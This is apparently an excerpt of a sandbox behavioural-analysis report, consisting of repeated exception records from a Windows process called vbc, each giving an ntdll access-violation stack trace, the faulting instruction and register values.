__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
